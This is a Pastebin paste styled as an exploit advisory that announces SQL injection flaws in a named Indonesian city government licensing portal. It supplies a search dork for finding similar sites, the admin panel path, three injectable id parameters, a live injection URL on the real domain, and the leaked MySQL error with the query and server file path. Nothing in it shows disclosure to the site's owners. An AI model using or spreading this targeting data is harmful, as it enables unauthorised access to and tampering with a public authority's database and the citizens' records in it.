KingSkrupellos

Pemerintah Kota Cimahi Pelayanan Terpadu Indonesia SQL Inj

May 3rd, 2019
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.90 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Pemerintah Kota Cimahi Pelayanan Terpadu Indonesia SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/05/2019
  7. # Vendor Homepage : dpmptsp.cimahikota.go.id
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : © 2017 - Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kota Cimahi. site:go.id
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Pemerintah Kota Cimahi Pelayanan Terpadu Indonesia is prone to an SQL-injection
  23. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # Admin Panel Login Path :
  34. ************************
  35. /pendaftaran
  36.  
  37. # SQL Injection Exploit :
  38. **********************
  39. /article/detail?id=[SQL Injection]
  40.  
  41. /video/detail?id=[SQL Injection]
  42.  
  43. /announcement/detail?id=[SQL Injection]
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. © 2017 - Dinas Penanaman Modal dan Pelayanan Terpadu Satu Pintu Kota Cimahi.
  50.  
  51. Sistem Informasi Pelayanan Perizinan Terpadu (SiPinter)
  52. Integrated Licensing Service Information System (SiPinter)
  53.  
  54. [+] dpmptsp.cimahikota.go.id/article/detail?id=1%27
  55.  
  56. ###################################################################
  57.  
  58. # Example SQL Database Error :
  59. ****************************
  60. Error Number: 1064
  61.  
  62. You have an error in your SQL syntax; check the manual that corresponds
  63. to your MySQL server version for the right syntax to use near '= 1
  64. WHERE `article_id` IS NULL' at line 1
  65.  
  66. UPDATE `m_article` SET = 1 WHERE `article_id` IS NULL
  67.  
  68. Filename: C:/wamp/www/bpmptsp/application/core/TS_Model.php
  69.  
  70. Line Number: 237
  71.  
  72. ###################################################################
  73.  
  74. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  75.  
  76. ###################################################################
Add Comment
Please, Sign In to add comment